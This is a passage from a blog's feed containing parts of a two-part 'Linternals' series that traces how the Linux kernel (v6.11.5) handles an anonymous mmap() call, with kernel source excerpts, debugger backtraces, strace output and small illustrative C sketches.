prevent the creation of mappings with write and execute permissions if the <code>mm</code> has the <code>MMF_HAS_MDWE</code> flag set (note a similar check is also done by selinux via the <code>mmap_file</code> hook).</p><p>Finally, our <code>vma</code> is ready to be inserted into the <code>mm-&gt;mm_mt</code>; this is done by first preallocating enough nodes for the insertion (store) [9]. </p><p>Then, if <code>CONFIG_PER_VMA_LOCK=y</code>, the per-vma write lock will be taken [10], which acts as a r/w semaphore in practice. This is interesting, because you might notice there is no subsequent unlock for <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm.h#L740">vma_start_write()</a></code>. That&apos;s because all vma write locks are unlocked automatically when the mmap write lock is released, <a href="https://docs.kernel.org/mm/process_addrs.html#locking">read more here</a>. 
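</p><p>That &quot;all unlocked at once&quot; behaviour can be modelled with a sequence counter. The sketch below is illustrative (the <code>toy_*</code> names are invented); the kernel&apos;s real scheme pairs the per-vma <code>vm_lock_seq</code> with the mm-wide <code>mm_lock_seq</code> and also involves a per-vma semaphore:</p>

```c
#include <assert.h>

/* Toy model: taking a vma write lock records the mm's current sequence
 * number; bumping that sequence when the mmap write lock is released
 * implicitly "unlocks" every vma at once. */
struct toy_mm  { unsigned long mm_lock_seq; };
struct toy_vma { unsigned long vm_lock_seq; };

static void toy_vma_start_write(struct toy_mm *mm, struct toy_vma *vma)
{
    vma->vm_lock_seq = mm->mm_lock_seq;  /* mark vma as write-locked */
}

static int toy_vma_write_locked(const struct toy_mm *mm,
                                const struct toy_vma *vma)
{
    return vma->vm_lock_seq == mm->mm_lock_seq;
}

static void toy_mmap_write_unlock(struct toy_mm *mm)
{
    mm->mm_lock_seq++;  /* one increment releases all vma write locks */
}
```

<p>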
</p><p>Finally, our new mapping is inserted into the <code>mm-&gt;mm_mt</code> tree via the iterator [11], using <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/internal.h#L1437">vma_iter_store()</a></code>, and the process&apos;s total mapping count is updated [12].</p><h3 id="final-bits">Final Bits</h3><figure class="kg-card kg-code-card"><pre><code class="language-C">	vm_stat_account(mm, vm_flags, len &gt;&gt; PAGE_SHIFT);
	// SNIP
    
	/*
	 * New (or expanded) vma always get soft dirty status.
	 * Otherwise user-space soft-dirty page tracker won&apos;t
	 * be able to distinguish situation when vma area unmapped,
	 * then new mapped in-place (which must be aimed as
	 * a completely new data area).
	 */
	vm_flags_set(vma, VM_SOFTDIRTY);

	vma_set_page_prot(vma);

	validate_mm(mm);
	return addr;
</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L2849">mm/mmap.c</a></figcaption></figure><p>There are some bits we&apos;ve skipped related to files or huge pages, but eventually we&apos;ll get here, to the end of the function (we&apos;re almost there!!). So what&apos;s left to do?</p><p>Some accounting of course! <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L3612">vm_stat_account()</a></code> updates various <code>mm</code> stat fields tracking the types of mappings, including: <code>mm-&gt;total_vm</code> (total pages), <code>mm-&gt;exec_vm</code>, <code>mm-&gt;stack_vm</code> and <code>mm-&gt;data_vm</code> (private, writable, not stack). </p><p>Now, regardless of whether this is a new or expanded vma, the <code>VM_SOFTDIRTY</code> flag is set. Dirty is memory management speak for &quot;this has been modified btw!&quot;. Typically this is in the context of changes to a file in memory that aren&apos;t written to disk yet. Here, if <code>CONFIG_MEM_SOFT_DIRTY=y</code> is set, this bit is used to indicate that the vma has been modified (as I understand it, the &quot;soft&quot; part means it doesn&apos;t require immediate action by the kernel, but will be checked when the next relevant action is taken). We&apos;ll touch more on what these &quot;actions&quot; are in the next section when we cover paging.</p><p><code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L90">vma_set_page_prot()</a></code> will update <code>vma-&gt;vm_page_prot</code> to reflect <code>vma-&gt;vm_flags</code>. Next is <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L322">validate_mm()</a></code>, which is a debugging function that validates the state of the memory mappings. 
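</p><p>As an aside, the <code>vm_flags</code>-to-protection translation behind <code>vma_set_page_prot()</code> can be pictured as a small lookup table indexed by the read/write/exec bits, loosely in the spirit of the kernel&apos;s <code>protection_map</code>. The sketch below is illustrative: the <code>VM_*</code> values match the kernel&apos;s flag bits, but the <code>fake_prot</code> values are placeholders rather than real page-table bits:</p>

```c
#include <assert.h>

#define VM_READ  0x1UL
#define VM_WRITE 0x2UL
#define VM_EXEC  0x4UL

/* Placeholder "pgprot" values; the real ones are arch-specific. */
enum fake_prot { FPROT_NONE, FPROT_RO, FPROT_RW, FPROT_RX, FPROT_RWX };

/* Table indexed by the rwx bits of vm_flags. */
static const enum fake_prot fake_protection_map[8] = {
    [0]                            = FPROT_NONE,
    [VM_READ]                      = FPROT_RO,
    [VM_WRITE]                     = FPROT_RW,   /* write implies read here */
    [VM_READ | VM_WRITE]           = FPROT_RW,
    [VM_EXEC]                      = FPROT_RX,
    [VM_EXEC | VM_READ]            = FPROT_RX,
    [VM_EXEC | VM_WRITE]           = FPROT_RWX,
    [VM_EXEC | VM_WRITE | VM_READ] = FPROT_RWX,
};

static enum fake_prot get_page_prot(unsigned long vm_flags)
{
    return fake_protection_map[vm_flags & (VM_READ | VM_WRITE | VM_EXEC)];
}
```

<p>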
<code>validate_mm()</code> is only enabled on debug builds with <code>CONFIG_DEBUG_VM_MAPLE_TREE=y</code>.</p><p>And last, but not least, we return the <code>addr</code> of our new mapping, which will propagate back, if all is valid, to the return value of the userspace <code>mmap()</code> call.</p><pre><code>#0  mmap_region (file=file@entry=0x0 &lt;fixed_percpu_data&gt;, addr=addr@entry=140379443372032, len=len@entry=4096, vm_flags=vm_flags@entry=115, 
    pgoff=pgoff@entry=34272325042, uf=uf@entry=0xffffc900006bbef0) at mm/mmap.c:2852
#1  0xffffffff81247544 in do_mmap (file=file@entry=0x0 &lt;fixed_percpu_data&gt;, addr=140379443372032, addr@entry=0, len=len@entry=4096, 
    prot=&lt;optimized out&gt;, prot@entry=3, flags=flags@entry=34, vm_flags=&lt;optimized out&gt;, vm_flags@entry=0, pgoff=&lt;optimized out&gt;, 
    populate=0xffffc900006bbee8, uf=0xffffc900006bbef0) at mm/mmap.c:1468
#2  0xffffffff812160c7 in vm_mmap_pgoff (file=0x0 &lt;fixed_percpu_data&gt;, addr=0, len=4096, prot=3, flag=34, pgoff=0) at mm/util.c:588
#3  0xffffffff81f8e8fe in do_syscall_x64 (regs=0xffffc900006bbf58, nr=&lt;optimized out&gt;) at arch/x86/entry/common.c:52
#4  do_syscall_64 (regs=0xffffc900006bbf58, nr=&lt;optimized out&gt;) at arch/x86/entry/common.c:83
#5  0xffffffff82000130 in entry_SYSCALL_64 () at arch/x86/entry/entry_64.S:121</code></pre><p>Not much happens when we return to <code>do_mmap()</code>, other than deciding how many pages, if any, need to be populated, before returning to <code>vm_mmap_pgoff()</code>. This function will then drop the mmap write lock and do any relevant userfaultfd and population bits. </p><p>Although out of scope, populating a mapping essentially involves doing what we&apos;re going to cover in the next section (writing to memory) now, instead of waiting to access it.</p><p>Then we&apos;re pretty much back in userspace, with a shiny new (or merged) mapping!</p><h3 id="summary">Summary</h3><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2025/04/confused.gif" class="kg-image" alt="Linternals: Exploring The mm Subsystem via mmap [0x02]" loading="lazy" width="504" height="322"></figure><p>It&apos;s only been, uh, 6000 words or so but just like that we&apos;ve covered this line of code:</p><pre><code>addr = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);</code></pre><p>We did a whistle-stop (?!) tour of the <code>mmap()</code> system call, focusing on how private, anonymous mappings are created and managed by the kernel. </p><p>We got some first-hand experience of how the <code>struct mm_struct</code> helps manage a process&apos;s memory, including the <code>mm-&gt;mm_mt</code> tree, which tracks the memory areas within the process&apos;s virtual address space, which are represented by <code>struct vm_area_struct</code>.</p><p>We also dived into some implementation details, covering some of the security mechanisms and checks, how unused addresses for new mappings are found and the different cases that need to be considered when mapping a new region.</p><hr><ol><li>If you&apos;re curious why <code>mmap_min_addr</code> is a thing, this mitigation was added way back in 2009 for 2.X kernels. 
For context then, <a href="https://blog.cr0.org/2009/06/bypassing-linux-null-pointer.html">check out this post from 2009</a> on bypassing it. For a bonus, there was <a href="https://googleprojectzero.blogspot.com/2023/01/exploiting-null-dereferences-in-linux.html">a semi-recent P0 post</a> about modern NULL ptr deref exploitation. </li><li><a href="https://www.kernel.org/doc/html/next/userspace-api/mseal.html">https://www.kernel.org/doc/html/next/userspace-api/mseal.html</a></li></ol><h2 id="next-time">Next Time</h2><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2025/04/weary_pc.gif" class="kg-image" alt="Linternals: Exploring The mm Subsystem via mmap [0x02]" loading="lazy" width="435" height="250"></figure><p>Wow, I may have got a bit lost in the sauce for this one (sorry)... Hopefully this is useful for someone. This time we covered the first portion of our simple program: mapping memory. Next time, we&apos;ll move on to writing to memory. Buckle up, as that&apos;ll involve a deep dive into how the kernel does all things (*specifically pertaining to our case study) paging, starting with page faults and going from there (wish me luck).</p><p>That said, I think my next post might be more exploitation focused, both for my own sanity after this 6000-word linternals dump and also as it&apos;s been a while since I published some security stuff. 
Anyways, like I said, I&apos;m hoping this post bordered more on the &quot;in depth but verbose walkthrough of linux internals&quot; and not &quot;mad ramblings of someone who overcommitted to an ambitious series&quot;.</p><p>As always feel free to @me (on <a href="https://twitter.com/sam4k1">X</a>, <a href="https://bsky.app/profile/sam4k.com">Bluesky</a> or less commonly used <a href="https://infosec.exchange/@sam4k">Mastodon</a>) if you have any questions, suggestions or corrections :)</p>]]></content:encoded></item><item><title><![CDATA[Linternals: Exploring The mm Subsystem via mmap [0x01]]]></title><description><![CDATA[In this series we'll explore the Linux kernel's memory management subsystem, using a simple userspace program as our starting point.]]></description><link>https://sam4k.com/linternals-exploring-the-mm-subsystem-part-1/</link><guid isPermaLink="false">67010c30de619fc1154ef57d</guid><category><![CDATA[linternals]]></category><category><![CDATA[memory]]></category><category><![CDATA[linux]]></category><dc:creator><![CDATA[sam4k]]></dc:creator><pubDate>Mon, 16 Dec 2024 14:00:01 GMT</pubDate><media:content url="https://sam4k.com/content/images/2024/10/linternals.gif" medium="image"/><content:encoded><![CDATA[<img src="https://sam4k.com/content/images/2024/10/linternals.gif" alt="Linternals: Exploring The mm Subsystem via mmap [0x01]"><p>That&apos;s right, you&apos;re not hallucinating, Linternals is back! 
It&apos;s been a <em>while</em>, I know, but after some travelling and moving to a new role, I&apos;ve finally found some time to ramble.</p><p>For those of you unfamiliar with the series (or who have understandably forgotten it existed), I&apos;ve covered several topics relating to kernel memory management previously:</p><ul><li><a href="https://sam4k.com/linternals/#virtual-memory">The &quot;Virtual Memory&quot; series</a> of posts discusses the differences between physical and virtual memory, exploring both the user and kernel virtual address spaces</li><li><a href="https://sam4k.com/linternals/#memory-allocators">The series on &quot;Memory Allocators&quot;</a> covers the role of memory allocators in general before moving on to detailing the kernel&apos;s page and slab allocators </li></ul><p>This post might be a little different, as I&apos;m writing this introduction before I&apos;ve actually planned 100% what I&apos;ll be writing about. I know I want to explore the memory management (mm) subsystem in more detail, building on what we&apos;ve covered so far, but the issue is...
what the user sees) and follow the source, building up an understanding of the relevant structures and API as we go.</p><p>So we&apos;ll take a simple action - mapping and writing to some (anonymous) memory in userspace - and see how deep we can go into the kernel, exploring what is actually going on under the hood. <em>Hopefully</em> this will provide an interesting and informative read, giving some insights on some of the key structures and functions of the kernel&apos;s mm subsystem. </p><div class="kg-card kg-callout-card kg-callout-card-grey"><div class="kg-callout-emoji">&#x1F427;</div><div class="kg-callout-text">This post is based on the latest kernel at the time of writing, 6.11.5, and x86_64.</div></div><h2 id="contents">Contents</h2><!--kg-card-begin: markdown--><ul>
<li><a href="#what-is-memory-management">What is Memory Management?</a></li>
<li><a href="#overview-of-the-mm-subsystem">Overview of The MM Subsystem</a>
<ul>
<li><a href="#representing-memory">Representing Memory</a></li>
<li><a href="#allocating-memory">Allocating Memory</a></li>
<li><a href="#mapping-memory">Mapping Memory</a></li>
<li><a href="#managing-memory">Managing Memory</a></li>
</ul>
</li>
<li><a href="#getting-lost-in-the-source">Getting Lost in The Source</a></li>
<li><a href="#mapping-memory-1">Mapping Memory</a>
<ul>
<li><a href="#entering-the-kernel">Entering The Kernel</a></li>
<li><a href="#x64sysmmap"><code>__x64_sys_mmap()</code></a></li>
<li><a href="#ksysmmappgoff"><code>ksys_mmap_pgoff()</code></a></li>
<li><a href="#vmmmappgoff"><code>vm_mmap_pgoff()</code></a>
<ul>
<li><a href="#fetching-our-mmstruct">Fetching Our <code>mm_struct</code></a></li>
<li><a href="#a-bit-of-security">A Bit Of Security</a></li>
<li><a href="#locking">Locking</a></li>
</ul>
</li>
</ul>
</li>
<li><a href="#next-time">Next Time</a></li>
</ul>
<!--kg-card-end: markdown--><h2 id="what-is-memory-management">What is Memory Management? </h2><p>So before we get stuck into the nitty-gritty details, let&apos;s talk about what we mean by memory management. Fortunately, unlike some of the topics we&apos;ve covered (I&apos;m looking at you SLUB), this one&apos;s fairly self-explanatory: it&apos;s about managing a system&apos;s memory.</p><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2024/12/lets_break_it_down.gif" class="kg-image" alt="Linternals: Exploring The mm Subsystem via mmap [0x01]" loading="lazy" width="480" height="270"></figure><p>Memory, in this sense, covers the range of storage a modern system may use: HDDs and SSDs, RAM, CPU registers and caches etc. Managing this involves providing representations of the various types of memory and means for the kernel and userspace to efficiently access and utilise them.</p><p>Let&apos;s take the everyday (and oversimplified) example of running a program on our computer. We can see memory management involved every step of the way:</p><ul><li>First, the program itself is stored on disk and must be read</li><li>It is then loaded into RAM, where the physical address in memory is mapped into our process&apos; virtual address space; commonly loaded data will make use of caches</li><li>We&apos;ve talked about how the kernel and userspace have their own virtual address spaces, with their own mappings and protections which need to be managed</li><li>Then we have the execution of the code itself, which will make use of various CPU registers; it will also need to ask the kernel to do privileged things via system calls, so we also need to consider the transition between userspace and the kernel!</li></ul><p>Hopefully this highlights how fundamental the memory management subsystem is and gives a glimpse at its many responsibilities. 
</p><h2 id="overview-of-the-mm-subsystem">Overview of The MM Subsystem</h2><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2024/12/tell_me_more.gif" class="kg-image" alt="Linternals: Exploring The mm Subsystem via mmap [0x01]" loading="lazy" width="635" height="340"></figure><p>Okay, what does this <em>actually</em> look like? The kernel has several <a href="https://docs.kernel.org/subsystem-apis.html">core subsystems</a>, one of which is the <a href="https://docs.kernel.org/mm/index.html">memory management subsystem</a>. Looking at the kernel source tree, this is located in the aptly named <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm">mm/</a></code> subdirectory. </p><p>I figured we could highlight some of the key files in there to give a sense of the subsystem&apos;s role and structure in a more tangible context. Like many of my decisions, this turned out to be harder than I thought, but we&apos;ll give it a go. </p><h3 id="representing-memory">Representing Memory</h3><p>To be able to manage memory, we need to be able to represent it in a way the kernel can work with. There are a number of key structures used by the <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm">mm/</a></code> subsystem, many of which can be found in <a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm_types.h">include/linux/mm_types.h</a>. 
This includes:</p><ul><li>Representations for chunks of physically contiguous memory (<code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm_types.h#L72">struct page</a></code>) and the tables used to organise how this memory is accessed.</li><li>The <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm_types.h#L779">struct mm_struct</a></code> provides a description of a process&apos; virtual address space, including its different areas of virtual memory (<code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm_types.h#L664">struct vm_area_struct</a></code>).</li><li>The <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm_types.h#L779">mm_struct</a></code> also includes a pointer to the uppermost table (<code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm_types.h#L806">pgd_t * pgd</a></code>) which is used to map our process&apos; virtual addresses to a specific page in physical memory. </li></ul><h3 id="allocating-memory">Allocating Memory</h3><p>With our memory represented, we need a way to actually make use of it! The various allocation mechanisms fall under the memory management subsystem, providing ways to manage the pool of available physical memory and allocate it to be used. This includes:</p><ul><li>The page allocator (<code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/page_alloc.c">mm/page_alloc.c</a></code>) for allocating physically contiguous memory of at least <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/include/asm/page_types.h#L11">PAGE_SIZE</a></code>.</li><li>The slab allocator for the efficient allocation of (physically contiguous) objects, via the <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/slab.h#L687">kmalloc()</a></code> API. 
<code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/slab.h">mm/slab.h</a></code> and <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/slab_common.c">mm/slab_common.c</a></code> define the common API, while the SLUB implementation can be found at <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/slub.c">mm/slub.c</a></code>.</li><li><code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/vmalloc.c">mm/vmalloc.c</a></code> provides an alternative API for allocating <em><strong>virtually</strong></em> contiguous memory and is used for large allocations that may be hard to find physically contiguous space for. E.g. <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/slab.h#L817">kvmalloc()</a></code> will <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/slab.h#L687">kmalloc()</a></code> but use <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/vmalloc.h#L144">vmalloc()</a></code> as a fallback!</li></ul><h3 id="mapping-memory">Mapping Memory</h3><p>So far we&apos;ve touched mainly on how to manage physical memory, but as we know there&apos;s a lot more to it than that! Sure, we can map chunks of physical memory into our virtual address space to work on, but what about stuff that sits on disk?</p><ul><li><code><a href="https://man7.org/linux/man-pages/man2/mmap.2.html">mmap(2)</a></code> (<code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L1521">mm/mmap.c</a></code>) is one-stop shop for userspace mappings and allows us to map physical memory into our processes&apos; virtual address space so we can access it. This can be anonymous memory (i.e. 
just a chunk of physical memory for us to use) or it can also be used to map a previously opened file into physical memory too!</li><li><code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/filemap.c">mm/filemap.c</a></code> contains some core, generic, functionality for managing file mappings, including the use of a page cache for file data. This can then be utilised by file systems when they <code><a href="https://man7.org/linux/man-pages/man2/read.2.html">read(2)</a></code> or <code><a href="https://man7.org/linux/man-pages/man2/write.2.html">write(2)</a></code> files for example. </li><li>The <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/mm/ioremap.c#L322">ioremap()</a></code> API is used for mapping device memory into the kernel virtual address space. An example would be a GPU kernel driver mapping some GPU memory into the kernel virtual address space so it can access it. If you recall the <a href="https://sam4k.com/linternals-virtual-memory-part-3/#kernel-virtual-memory-map">post on the kernel virtual address space</a>, you&apos;ll see that the kernel memory map has a specific region for <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/mm/ioremap.c#L322">ioremap()</a></code>/<code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/vmalloc.h#L144">vmalloc()</a></code>&apos;d memory! And why do they share memory? Because under the hood <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/mm/ioremap.c#L322">ioremap()</a></code> uses the <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/vmalloc.c#L3404">vmap()</a></code> API...</li><li>The <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/vmalloc.c#L3404">vmap()</a></code> API allows the kernel to map a set of physical pages to a range of contiguous virtual addresses (within the vmalloc/ioremap space). 
As we&apos;ve mentioned, this is used by both <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/vmalloc.h#L144">vmalloc()</a></code> and <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/mm/ioremap.c#L322">ioremap()</a></code>. As a result you can find some functionality for all of them in <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/vmalloc.c">mm/vmalloc.c</a></code>.</li></ul><h3 id="managing-memory">Managing Memory</h3><p>We&apos;ve talked a lot about the building blocks for managing memory, but what about actual high-level management of memory? Well there&apos;s plenty of that too!</p><ul><li>There are a number of syscalls found in <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm">mm/</a></code> related to memory management: <code><a href="https://man7.org/linux/man-pages/man2/mmap.2.html">mmap(2)</a></code> and <code><a href="https://man7.org/linux/man-pages/man2/mmap.2.html">munmap(2)</a></code> for managing mappings, <code><a href="https://man7.org/linux/man-pages/man2/mprotect.2.html">mprotect(2)</a></code> for managing access protections of mappings, <code><a href="https://man7.org/linux/man-pages/man2/madvise.2.html">madvise(2)</a></code> for giving the kernel advice on how to handle mapped pages, <code><a href="https://man7.org/linux/man-pages/man2/mlock.2.html">mlock(2)</a></code> and <code><a href="https://man7.org/linux/man-pages/man2/mlock.2.html">munlock(2)</a></code> to un/lock memory in RAM etc.</li><li>We also have other key management functionality such as how to handle when the system runs out of memory (<code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/oom_kill.c">mm/oom_kill.c</a></code>) and the memory control groups (memcgs, <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/memcontrol.c">mm/memcontrol.c</a></code>) which provide a way to manage the resources available to specific groups of processes. 
</li><li><code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/swapfile.c">mm/swapfile.c</a></code> allows us to allocate &quot;swap&quot; files. This allows the kernel to use a portion of disk space (the swap file) as an extension of physical memory. When physical memory availability is low, the kernel will &quot;swap&quot; out inactive/old pages of physical memory to the swap file in order to free up physical memory.</li></ul><h2 id="getting-lost-in-the-source">Getting Lost in The Source</h2><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2024/12/going_on_an_adventure.gif" class="kg-image" alt="Linternals: Exploring The mm Subsystem via mmap [0x01]" loading="lazy" width="500" height="200"></figure><p>Alright, here&apos;s the plan: we will begin our journey with a simple C program that maps some anonymous memory, writes to it and then unmaps it. Sounds easy enough, right?</p><p>To refresh, &quot;mapping&quot; memory essentially involves pointing some portion of our process&apos;s virtual address space to somewhere in physical memory. This could be a file read into physical memory, but we can also map &quot;anonymous&quot; memory. This is just physical memory that has been allocated specifically for this mapping and wasn&apos;t previously tied to a file. But we&apos;ll get into that more shortly; for now, here&apos;s the code:</p><pre><code class="language-C">#include &lt;sys/mman.h&gt;

int main()
{
    void *addr;

    addr = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
    *(long*)addr = 0x4142434445464748;

    munmap(addr, 0x1000);
    return 0;
}
</code></pre><p>So what&apos;s going on here? We map <code>0x1000</code> bytes (i.e. a page) of anonymous memory into our virtual address space, pointed to by <code>addr</code>. We then write 8 bytes, <code>0x4142434445464748</code>, to that address (which points to a page in physical memory). With our work done, we then unmap the anonymous memory and exit.</p><p>Okay, now we understand what the program is doing from a user&apos;s perspective - we&apos;re just writing some bytes to some physical memory we allocated. But what&apos;s the kernel actually doing under the hood? The primary API between the userspace and the kernel is system calls, so we can use <code><a href="https://man7.org/linux/man-pages/man1/strace.1.html">strace</a></code> to understand how our little program interacts with the kernel. Perhaps unsurprisingly, it&apos;s not too dissimilar: </p><pre><code>&gt; strace ./mm_example
// snip (process setup)
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f487ed24000
munmap(0x7f487ed24000, 4096)            = 0
exit_group(0)
+++ exited with 0 +++</code></pre><p>The libc <code>mmap()</code> and <code>munmap()</code> calls are just wrappers around the respective system calls, which we can see here. The only part of the program that doesn&apos;t use system calls is when we write to the memory, but as we&apos;ll soon see, that doesn&apos;t mean the kernel isn&apos;t involved!</p><h2 id="mapping-memory-1">Mapping Memory</h2><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2024/12/kermit_map.gif" class="kg-image" alt="Linternals: Exploring The mm Subsystem via mmap [0x01]" loading="lazy" width="400" height="256"></figure><p>So let&apos;s start our dive into the kernel by seeing how memory is mapped.</p><pre><code class="language-C">void *mmap(void addr[.length], size_t length, int prot, int flags,
                  int fd, off_t offset);
int munmap(void addr[.length], size_t length);
</code></pre><p><code><a href="https://man7.org/linux/man-pages/man2/mmap.2.html">mmap(2)</a></code> is the system call which &quot;creates a new mapping in the virtual address space of the calling process&quot;; for usage information check out the man page. </p><p>In our case we&apos;re creating a mapping of <code>0x1000</code> bytes, AKA <code>PAGE_SIZE</code>. We want to be able to read and write to it, so we have specified the <code>PROT_READ | PROT_WRITE</code> protection flags. As we touched on before, we&apos;re not mapping a file or anything, so we specify <code>MAP_ANONYMOUS</code> - we just want to map a page of unused physical memory. </p><p>We also specify <code>MAP_PRIVATE</code>, which in the context of an anonymous mapping means that this mapping won&apos;t be shared with other processes, for example if we fork a child process. More broadly speaking it means &quot;Updates to the mapping are not visible to other processes mapping the same file, and are not carried through to the underlying file.&quot; <sup><a href="https://man7.org/linux/man-pages/man2/mmap.2.html">[1]</a></sup>.</p><p>Finally, because it&apos;s an anonymous mapping the file descriptor and offset fields are ignored (some implementations require the <code>fd</code> to be -1, so that&apos;s why we set it) as we&apos;re not mapping a file from which we might want to map at a specific offset. </p><h3 id="entering-the-kernel">Entering The Kernel</h3><p>Okay, so we understand the system call from a userspace perspective; how do we go about understanding how it&apos;s implemented? Well, without going into detail on how system calls work, we can generally find out a system call&apos;s &quot;entry point&quot; in the kernel by grepping the source for <code>SYSCALL_DEFINE.*&lt;syscall name&gt;</code>:</p><figure class="kg-card kg-code-card"><pre><code class="language-c">SYSCALL_DEFINE6(mmap, unsigned long, addr, unsigned long, len,
		unsigned long, prot, unsigned long, flags,
		unsigned long, fd, unsigned long, off)
{
	if (off &amp; ~PAGE_MASK)
		return -EINVAL;

	return ksys_mmap_pgoff(addr, len, prot, flags, fd, off &gt;&gt; PAGE_SHIFT);
}</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/kernel/sys_x86_64.c#L79">arch/x86/kernel/sys_x86_64.c</a> (v6.11.5)</figcaption></figure><p>Check out the macros over in <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/syscalls.h">include/linux/syscalls.h</a></code> if you&apos;re curious; this will also explain how to figure out the actual symbol for kernel debugging (spoiler: it&apos;s <code>__x64_sys_&lt;name&gt;</code> in our case). </p><p>That said, <code><a href="https://man7.org/linux/man-pages/man2/mmap.2.html">mmap(2)</a></code> was a terrible example for this little auditing tidbit as there are actually a lot of results for <code>SYSCALL_DEFINE.*mmap</code>. This is due to architecture-specific implementations and legacy versions. If you want to be extra sure, you can compare the arguments and architecture, or even whip out a debugger and break further in (e.g. on <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L1255">do_mmap()</a></code>) <sup>[2]</sup> and check the backtrace:</p><figure class="kg-card kg-code-card"><pre><code>(gdb) bt
#0  do_mmap (file=file@entry=0x0 &lt;fixed_percpu_data&gt;, addr=addr@entry=0, len=len@entry=8192, prot=prot@entry=3, flags=flags@entry=34, 
    pgoff=pgoff@entry=0, populate=0xffffc900004f7d08, uf=0xffffc900004f7d28) at mm/mmap.c:1408
#1  0xffffffff81890ae1 in vm_mmap_pgoff (file=file@entry=0x0 &lt;fixed_percpu_data&gt;, addr=addr@entry=0, len=len@entry=8192, prot=prot@entry=3, 
    flag=flag@entry=34, pgoff=pgoff@entry=0) at mm/util.c:551
#2  0xffffffff819139db in ksys_mmap_pgoff (addr=&lt;optimized out&gt;, len=8192, prot=prot@entry=3, flags=34, fd=&lt;optimized out&gt;, 
    pgoff=&lt;optimized out&gt;) at mm/mmap.c:1624
#3  0xffffffff810beff6 in __do_sys_mmap (addr=&lt;optimized out&gt;, len=&lt;optimized out&gt;, prot=3, flags=&lt;optimized out&gt;, fd=&lt;optimized out&gt;, 
    off=&lt;optimized out&gt;) at arch/x86/kernel/sys_x86_64.c:93
#4  __se_sys_mmap (addr=&lt;optimized out&gt;, len=&lt;optimized out&gt;, prot=3, flags=&lt;optimized out&gt;, fd=&lt;optimized out&gt;, off=&lt;optimized out&gt;)
    at arch/x86/kernel/sys_x86_64.c:86
#5  __x64_sys_mmap (regs=0xffffc900004f7f58) at arch/x86/kernel/sys_x86_64.c:86
#6  0xffffffff81008c2e in x64_sys_call (regs=regs@entry=0xffffc900004f7f58, nr=&lt;optimized out&gt;)
    at ./arch/x86/include/generated/asm/syscalls_64.h:10
#7  0xffffffff83be17a6 in do_syscall_x64 (regs=0xffffc900004f7f58, nr=&lt;optimized out&gt;) at arch/x86/entry/common.c:50
#8  do_syscall_64 (regs=0xffffc900004f7f58, nr=&lt;optimized out&gt;) at arch/x86/entry/common.c:80
#9  0xffffffff83e00124 in entry_SYSCALL_64 () at arch/x86/entry/entry_64.S:119</code></pre><figcaption>Backtrace from a 5.15 kernel using GDB</figcaption></figure><h3 id="x64sysmmap"><code>__x64_sys_mmap()</code></h3><figure class="kg-card kg-code-card"><pre><code class="language-c">SYSCALL_DEFINE6(mmap, unsigned long, addr, unsigned long, len,
		unsigned long, prot, unsigned long, flags,
		unsigned long, fd, unsigned long, off)
{
	if (off &amp; ~PAGE_MASK) // [0]
		return -EINVAL;

	return ksys_mmap_pgoff(addr, len, prot, flags, fd, off &gt;&gt; PAGE_SHIFT /* [1] */);
